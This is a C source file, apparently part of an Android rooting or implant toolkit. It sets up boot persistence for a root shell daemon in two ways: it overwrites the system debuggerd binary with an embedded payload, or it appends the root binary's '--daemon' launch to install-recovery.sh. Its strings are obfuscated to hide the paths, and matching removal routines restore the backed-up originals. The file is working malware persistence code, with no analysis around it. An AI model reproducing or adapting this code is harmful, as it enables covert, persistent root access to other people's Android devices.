#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "log.h" #include "shell_params.h" #include "deobfuscate.h" #include "old_shell.h" #include "runner_bin.h" #include "util.h" #include "boot_manager.h" // Create the boot script through debuggerd service int createDebuggerdBootScript(int is_64bit) { FILE *f1 = NULL; FILE *f2 = NULL; char install_script[1024]; char install_script_32_64[128]; struct stat st; static unsigned char sh_script[] = "\xc6\x25\xf3\x2f\x29\x2b\xff\xc1\xff\xf2\xed\xf5\x2b\xec\xf1\xe8\x2b\xff\xf6"; // "#!/system/bin/sh" static unsigned char system_str[] = "\x76\xcb\xba\xef\x1b\x11\x1b\x06\x15\x2d"; // "/system" memset(install_script, 0, sizeof(install_script)); memset(install_script_32_64, 0, sizeof(install_script_32_64)); if(is_64bit) snprintf(install_script_32_64, sizeof(install_script_32_64), "%s64", deobfuscate(INSTALL_SCRIPT)); else snprintf(install_script_32_64, sizeof(install_script_32_64), "%s", deobfuscate(INSTALL_SCRIPT)); // Create a copy of the original binary f1 = fopen(install_script_32_64, "r"); f2 = fopen(deobfuscate(INSTALL_SCRIPT_BAK), "w"); if(!f1 || !f2) return -1; if(fcopy(f1, f2) < 0) return -1; fclose(f1); fclose(f2); chmod(deobfuscate(INSTALL_SCRIPT_BAK), 0755); // Delete it! remove(install_script_32_64); // Create the install script f1 = fopen(install_script_32_64, "w"); fwrite(&runner, 1, sizeof(runner), f1); fclose(f1); chmod(install_script_32_64, 0755); return 0; } // Create the boot script through the install-recovery.sh int createRecoveryBootScript() { FILE *f1 = NULL; FILE *f2 = NULL; char install_script[1024]; struct stat st; static unsigned char sh_script[] = "\xc6\x25\xf3\x2f\x29\x2b\xff\xc1\xff\xf2\xed\xf5\x2b\xec\xf1\xe8\x2b\xff\xf6"; // "#!/system/bin/sh" static unsigned char system_str[] = "\x76\xcb\xba\xef\x1b\x11\x1b\x06\x15\x2d"; // "/system" static unsigned char daemon_opt[] = "\x70\x91\xe9\x7f\x7f\x34\x33\x37\x3f\x21\x3e"; // "--daemon" memset(install_script, 0, sizeof(install_script)); // Copy root boot script if(stat(deobfuscate(INSTALL_REC_SCRIPT), &st) < 0) { // Boot script (install-recovery.sh) doesn't exist yet LOGD("Boot script install-recovery.sh not present"); f2 = fopen(deobfuscate(INSTALL_REC_SCRIPT), "w"); if(!f2) return -1; fprintf(f2, "%s\n%s %s &\n", deobfuscate(sh_script), deobfuscate(ROOT_BIN), deobfuscate(daemon_opt)); fclose(f2); } else { // Boot script alredy exists LOGD("Boot script install-recovery.sh already exists"); chmod(deobfuscate(INSTALL_REC_SCRIPT), 0755); // Create a backup copy of the original file f1 = fopen(deobfuscate(INSTALL_REC_SCRIPT), "r"); f2 = fopen(deobfuscate(INSTALL_REC_SCRIPT_BAK), "w"); if(!f1 || !f2) return -1; if(fcopy(f1, f2) < 0) return -1; fclose(f1); fclose(f2); chmod(deobfuscate(INSTALL_REC_SCRIPT_BAK), 0755); // Ok, now append our content to the script file snprintf(install_script, sizeof(install_script), "\n%s %s &\n", deobfuscate(ROOT_BIN), deobfuscate(daemon_opt)); append_content(install_script, deobfuscate(INSTALL_REC_SCRIPT)); } chmod(deobfuscate(INSTALL_REC_SCRIPT), 0755); return 0; } // Create the proper boot script int createBootScript() { static unsigned char debuggerd_str[] = "\xe8\x4b\x84\xad\x93\xae\xa2\x87\x9d\x93\x58\x9c\x93\x9e\xa3\x91\x91\x93\xae\x9c\x58\x59\xad\x97\xad\xac\x93\x9b\x59\x9e\x87\x9a\x59\x9c\x93\x9e\xa3\x91\x91\x93\xae\x9c"; // "service debuggerd /system/bin/debuggerd" static unsigned char init_str[] = "\x66\x6f\x01\xd7\x11\x18\x11\xee\xd8\xec\x1b"; // "/init.rc" struct stat st; char *init_dump = (char *)read_file(deobfuscate(init_str)); if(strstr(init_dump, deobfuscate(debuggerd_str)) == NULL) { LOGD("Debuggerd service not present. Using install-recovery.sh.\n"); return createRecoveryBootScript(); } else { LOGD("Debuggerd service found in init.rc\n"); if(stat(deobfuscate(INSTALL_SCRIPT), &st) >= 0) return createDebuggerdBootScript(0); else return createDebuggerdBootScript(1); } // Never reached return 0; } // Remove the debuggerd boot script int removeDebuggerdBootScript() { static unsigned char system_dir[] = "\xfb\x8b\x77\xd4\x98\x86\x98\x91\xa2\xaa"; // "/system" char install_script_32_64[128]; struct stat st; if(stat(deobfuscate(INSTALL_SCRIPT), &st) >= 0) snprintf(install_script_32_64, sizeof(install_script_32_64), "%s", deobfuscate(INSTALL_SCRIPT)); else snprintf(install_script_32_64, sizeof(install_script_32_64), "%s64", deobfuscate(INSTALL_SCRIPT)); LOGD("Removing suid shell and debuggerd boot script\n"); // Delete the boot script unlink(install_script_32_64); LOGD("Restoring original debuggerd script"); rename(deobfuscate(INSTALL_SCRIPT_BAK), install_script_32_64); chmod(install_script_32_64, 0755); unlink(deobfuscate(INSTALL_SCRIPT_BAK)); // Remove root client unlink(deobfuscate(ROOT_BIN)); return 0; } // Remove the recovery boot script int removeRecoveryBootScript() { static unsigned char system_dir[] = "\xfb\x8b\x77\xd4\x98\x86\x98\x91\xa2\xaa"; // "/system" struct stat st; LOGD("Removing suid shell and install-recovery.sh boot script\n"); // Delete the boot script and check if we have to restore it unlink(deobfuscate(INSTALL_REC_SCRIPT)); if(stat(deobfuscate(INSTALL_REC_SCRIPT_BAK), &st) >= 0) { LOGD("Restoring original install script"); rename(deobfuscate(INSTALL_REC_SCRIPT_BAK), deobfuscate(INSTALL_REC_SCRIPT)); chmod(deobfuscate(INSTALL_REC_SCRIPT), 0755); } unlink(deobfuscate(ROOT_BIN)); return 0; } // Remove the proper boot script int removeBootScript() { struct stat st; // We need to understand how the shell was installed // If we used debuggerd as boot script if(stat(deobfuscate(INSTALL_SCRIPT_BAK), &st) >= 0) return removeDebuggerdBootScript(); else return removeRecoveryBootScript(); // Never reached return 0; } .